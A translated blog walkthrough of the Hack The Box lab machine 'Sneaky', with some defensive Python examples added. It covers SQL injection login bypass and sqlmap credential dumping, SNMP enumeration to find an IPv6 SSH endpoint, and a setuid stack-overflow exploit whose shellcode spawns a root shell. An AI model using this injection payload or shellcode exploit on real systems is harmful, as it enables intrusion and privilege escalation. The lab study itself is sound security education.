2020-03-21

I have to say the quality of this box is very high and it is well worth doing. (Pretending to console myself that the VIP subscription was not wasted.)

HTB::Sneaky Walkthrough

0x01 Info Card

0x02 Prior knowledge

IPv6

https://www.w3cschool.cn/ipv6/ipv6_address_types.html

http://www.what21.com/sys/view/net_ipv6_1536653956137.html

The main things to understand are the IPv6 address types and format, and how a host's MAC address is converted into the interface identifier of its locally derived IPv6 address (the EUI-64 method).

SNMP

https://www.manageengine.com/network-monitoring/what-is-snmp.html

For SNMP, the key concepts are the Management Information Base (MIB) and the Object Identifier (OID). The MIB is the collection of information used to manage network elements; the managed objects, each identified by an OID, form the tree structure shown below:

Buffer overflow

0x03 Tools and Tips

  • nmap
  • sqlmap
  • snmpwalk OR snmp-check
  • gdb
  • Basic SQL Injection
  • Enumerating SNMP
  • Basic buffer overflow exploitation

0x04 Pentesting

Scan the target's ports with nmap:

Nmap scan report for 10.10.10.20
Host is up (0.28s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/19%OT=80%CT=1%CU=37304%PV=Y%DS=2%DC=T%G=Y%TM=5E72D70
OS:C%P=i686-pc-windows-windows)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8
OS:)SEQ(CI=I%II=I)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54B
OS:ST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W
OS:5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 228.00 ms 10.10.16.1
2 296.00 ms 10.10.10.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 523.52 seconds

Visit the site on port 80:

It is a static page, so scan the site's directories with dirsearch:

Target: http://10.10.10.20/

[22:26:48] Starting:
[22:26:55] 403 - 289B - /.ht_wsr.txt
[22:26:55] 403 - 282B - /.hta
[22:26:55] 403 - 293B - /.htaccess-local
[22:26:55] 403 - 293B - /.htaccess-marco
[22:26:55] 403 - 291B - /.htaccess-dev
[22:26:55] 403 - 291B - /.htaccess.BAK
[22:26:55] 403 - 292B - /.htaccess.bak1
[22:26:55] 403 - 291B - /.htaccess.old
[22:26:55] 403 - 294B - /.htaccess.sample
[22:26:55] 403 - 292B - /.htaccess.orig
[22:26:55] 403 - 291B - /.htaccess.txt
[22:26:55] 403 - 292B - /.htaccess.save
[22:26:55] 403 - 293B - /.htaccess_extra
[22:26:55] 403 - 292B - /.htaccess_orig
[22:26:55] 403 - 290B - /.htaccessBAK
[22:26:55] 403 - 290B - /.htaccess_sc
[22:26:55] 403 - 290B - /.htaccessOLD
[22:26:55] 403 - 288B - /.htaccess~
[22:26:55] 403 - 291B - /.htaccessOLD2
[22:26:55] 403 - 286B - /.htgroup
[22:26:55] 403 - 291B - /.htpasswd-old
[22:26:55] 403 - 292B - /.htpasswd_test
[22:26:55] 403 - 288B - /.htpasswds
[22:26:56] 403 - 286B - /.htusers
[22:28:10] 301 - 307B - /dev -> http://10.10.10.20/dev/
[22:28:10] 200 - 464B - /dev/
[22:28:30] 200 - 183B - /index.html
[22:29:14] 403 - 291B - /server-status
[22:29:14] 403 - 292B - /server-status/

Task Completed

A dev path turns up, which is a backend login page; try a "universal password" SQL injection (authentication bypass):

The login succeeds:
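The "universal password" bypass works because the login form splices user input straight into the SQL text. As an added example (not code from this post or from the box), here is a small sqlite3 login in both forms: the vulnerable string-built query and the parameterized one that treats the same input as plain data. The user table and passwords are constructed sample values.

```python
import re
import sqlite3

# Constructed sample data: the user names mirror the write-up, the passwords do not.
SAMPLE_USERS = [("admin", "sample-admin-pw"), ("thrasivoulos", "sample-user-pw")]


def make_db():
    """In-memory users table in the shape of the dev.users table dumped below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Query built by string concatenation: the input becomes part of the SQL grammar.

    With password  ' OR '1'='1  the WHERE clause turns into
    name = 'admin' AND pass = '' OR '1'='1', which is true for every row.
    """
    sql = "SELECT name FROM users WHERE name = '%s' AND pass = '%s'" % (name, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Same query with bound parameters: the input is passed as data, never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND pass = ?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


def looks_like_injection(value):
    """Heuristic for login-form logging/alerting only: a quote followed by OR/AND, or a
    SQL comment token. Parameterization is the fix; this just makes attempts visible."""
    return re.search(r"'\s*(or|and)\b|--|/\*|#", value, re.IGNORECASE) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "admin", payload))  # a user name: bypassed
    print("safe:      ", login_safe(db, "admin", payload))        # None: rejected
    print("flagged:   ", looks_like_injection(payload))
```

sqlmap's `--dump` later in the post reads the whole table through the same concatenated query; the parameterized form gives it no grammar to break out of.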

There is an admin user and an SSH key, but no open port to log in on:

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

Save the request from BurpSuite as a file named sneaky.req and run sqlmap against it:

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 --dbs
...
[00:33:32] [INFO] fetching database names
available databases [4]:
[*] dev
[*] information_schema
[*] mysql
[*] performance_schema

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' --tables
...

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' -T 'users' --columns
...

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' -T 'users' -C 'name, pass' --dump
[00:38:48] [INFO] fetching entries of column(s) '`name`, pass' for table 'users' in database 'dev'
Database: dev
Table: users
[2 entries]
+--------------+----------------------+
| name | pass |
+--------------+----------------------+
| admin | sup3rstr0ngp4ssf0r4d |
| thrasivoulos | sup3rstr0ngp4ssf0r4d |
+--------------+----------------------+

Two users were dumped, but I had no further ideas, so I looked at a writeup for hints. OK, the UDP ports also need scanning: port 161 is running an SNMP service:

PORT      STATE         SERVICE        VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: fcf2da02d0831859
| snmpEngineBoots: 8
|_ snmpEngineTime: 6h24m47s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 9.74 Kb sent, 9.74 Kb received
| eth0
| IP address: 10.10.10.20 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:37:ed (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 7.92 Mb sent, 7.47 Mb received
| snmp-netstat:
| TCP 127.0.0.1:3306 0.0.0.0:0
|_ UDP 0.0.0.0:161 *:*

Since the IPv4 firewall does not expose port 22, switch approach and check which ports are open over IPv6. The prerequisite is knowing the target's IPv6 unique local address (roughly the IPv6 counterpart of an internal/private address), and that is where the SNMP service comes in.

Use snmpwalk to enumerate the target:

snmpwalk -v2c -c public 10.10.10.20 > sneakly.snmp

Open the file and search it for 10.10.10.20;

next to it we find the target's IPv6 address (written in decimal):

iso.3.6.1.2.1.4.34.1.4.2.16. is the OID prefix of the device's address entries

Converted to hexadecimal notation:

dead:beef::0250:56ff:feb9:2771

Of course, when I first opened this file I was completely baffled too and had no idea what the output meant. We can make snmpwalk's output more readable:

# install the MIB downloader
sudo apt-get install snmp-mibs-downloader

# edit the file and comment out the line "mibs :"
vim /etc/snmp/snmp.conf

Now run snmpwalk again; this time we can also pass an OID argument to cut down the output:

$ snmpwalk -v2c -c public 10.10.10.20 1.3.6.1.2.1.4.34.1.4.2.16
IP-MIB::ipAddressType.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:27:71" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:27:71" = INTEGER: unicast(1)

Tidied up, this is the same address we obtained a moment ago.

Besides this, a Python script written by the box's author can also be used to obtain the target's IPv6 address (linked from the original post).

Note that /etc/snmp/snmp.conf has to be changed back first, otherwise the script errors out when run.

$ nmap -sV -A -6 dead:beef::0250:56ff:feaa:0b69

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 22:11 IST
Nmap scan report for dead:beef::250:56ff:feaa:b69
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
| 2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
| 256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_ 256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info:
| IPv6 EUI-64:
| MAC address:
| address: 00:50:56:aa:0b:69
|_ manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds

Then log in to the target with the SSH key obtained earlier and grab user.txt:

λ ssh -6 -i sneaky.key thrasivoulos@dead:beef::0250:56ff:feb9:2771
The authenticity of host 'dead:beef::250:56ff:feb9:2771 (dead:beef::250:56ff:feb9:2771)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'dead:beef::250:56ff:feb9:2771' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Fri Mar 20 08:31:46 EET 2020

System load: 0.0 Processes: 160
Usage of /: 9.9% of 18.58GB Users logged in: 0
Memory usage: 10% IP address for eth0: 10.10.10.20
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Mar 20 08:31:47 2020 from dead:beef:4::1057
thrasivoulos@<hostname>:~$ ls
user.txt

Check for SUID files:

thrasivoulos@<hostname>:~$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null;
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
-rwsr-xr-x 1 root root 35300 May 4 2017 /bin/su
-rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsrwsr-x 1 root root 7301 May 4 2017 /usr/local/bin/chal
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 35916 May 4 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 66284 May 4 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 45420 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-xr-x 1 root root 30984 May 4 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 156708 Oct 14 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 44620 May 4 2017 /usr/bin/chfn
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device

Explanation of the command:

-perm -4000: list files and directories that have the setuid bit set

-user root: owned by root

-exec ls -ld {} \; : run ls -ld on each file found

2>/dev/null: discard standard error
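The find one-liner is the manual form of a setuid audit. As an added example, not part of this post, the Python below implements the same filter (setuid bit, owner, unreadable entries discarded) and adds the two things a defender wants on top of the raw list: a diff against a known-good baseline, and a mode check that flags a binary like the -rwsrwsr-x one above, which is setuid, setgid and group-writable at the same time. The sample tree it builds is constructed, and the baseline is whatever list you recorded from a clean image.

```python
import os
import pwd
import stat
import tempfile


def mode_flags(mode):
    """Return the risk-relevant bits of an st_mode as labels.
    A file shown by ls as -rwsrwsr-x (mode 0o6775) yields all of setuid, setgid, group-writable."""
    labels = []
    if mode & stat.S_ISUID:
        labels.append("setuid")
    if mode & stat.S_ISGID:
        labels.append("setgid")
    if mode & stat.S_IWGRP:
        labels.append("group-writable")
    if mode & stat.S_IWOTH:
        labels.append("world-writable")
    return labels


def find_setuid(root, owner_uid=0):
    """Equivalent of `find ROOT -perm -4000 -user root 2>/dev/null`: regular files with the
    setuid bit owned by owner_uid (None = any owner). Errors are skipped, not reported."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def describe(path):
    """Render an `ls -ld`-style line for one file: mode string, owner, size, path."""
    st = os.lstat(path)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    return "%s %s %d %s" % (stat.filemode(st.st_mode), owner, st.st_size, path)


def unexpected(hits, baseline):
    """Setuid binaries present now that were not in the recorded baseline."""
    return sorted(set(hits) - set(baseline))


def has_setuid_bit(path):
    return bool(os.lstat(path).st_mode & stat.S_ISUID)


def make_sample_tree():
    """Constructed sample tree: one ordinary file and one file we mark setuid."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    plain = os.path.join(root, "plain.bin")
    marked = os.path.join(root, "sample-setuid")
    for p in (plain, marked):
        with open(p, "wb") as f:
            f.write(b"\x7fELF")  # placeholder content, not a real binary
    os.chmod(marked, 0o4755)
    return root, plain, marked


if __name__ == "__main__":
    # Hypothetical baseline: replace with the list recorded from a clean install.
    BASELINE = ["/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/sudo", "/usr/bin/passwd"]
    found = find_setuid("/", owner_uid=0)
    for p in unexpected(found, BASELINE):
        print(describe(p), mode_flags(os.lstat(p).st_mode))
```

Run periodically, the baseline diff is what turns a long SUID listing into a short one: every root-owned setuid file that is not in the recorded list is a review item, and any that is also group- or world-writable is a finding on its own, because whoever can write it can change what runs as root.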

Look at the /usr/local/bin/chal file:

thrasivoulos@<hostname>:~$ file /usr/local/bin/chal
/usr/local/bin/chal: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=fc8ad06fcfafe1fbc2dbaa1a65222d685b047b11, not stripped

OK, from here on we enter my blind spot: this involves exploiting a stack overflow, so I can only follow the experts' writeups step by step.

Shellcode:http://shell-storm.org/shellcode/files/shellcode-811.php

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
thrasivoulos@<hostname>:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# cat /root/root.txt
c515[----------------------------]fb33

0x05 Summary

Sneaky is a 2017 box rated 5 points, and I have to say its quality is very high. After scanning the usual TCP ports and web paths, a basic SQL injection yields the user names and an SSH key, but then we hit the problem that port 22 is not open. Scanning the UDP ports next reveals an SNMP service; with snmpwalk we can issue GETNEXT requests to query the whole OID subtree under a given OID, which gives us the target's IPv6 address, and an nmap scan over IPv6 shows SSH on port 22 is open there. Escalating to root, however, requires stack overflow knowledge that I really lack the background for, and it was hard to follow; marking it for now, to study again when I have time.

0x06 Reference

https://www.youtube.com/watch?v=1UGxjqTnuyo&feature=youtu.be

https://s1gh.sh/hackthebox-sneaky-walkthrough/

https://hkh4cks.com/blog/2017/12/30/htb-sneaky-walkthrough/

https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/

Copyright © ca01h 2019-2020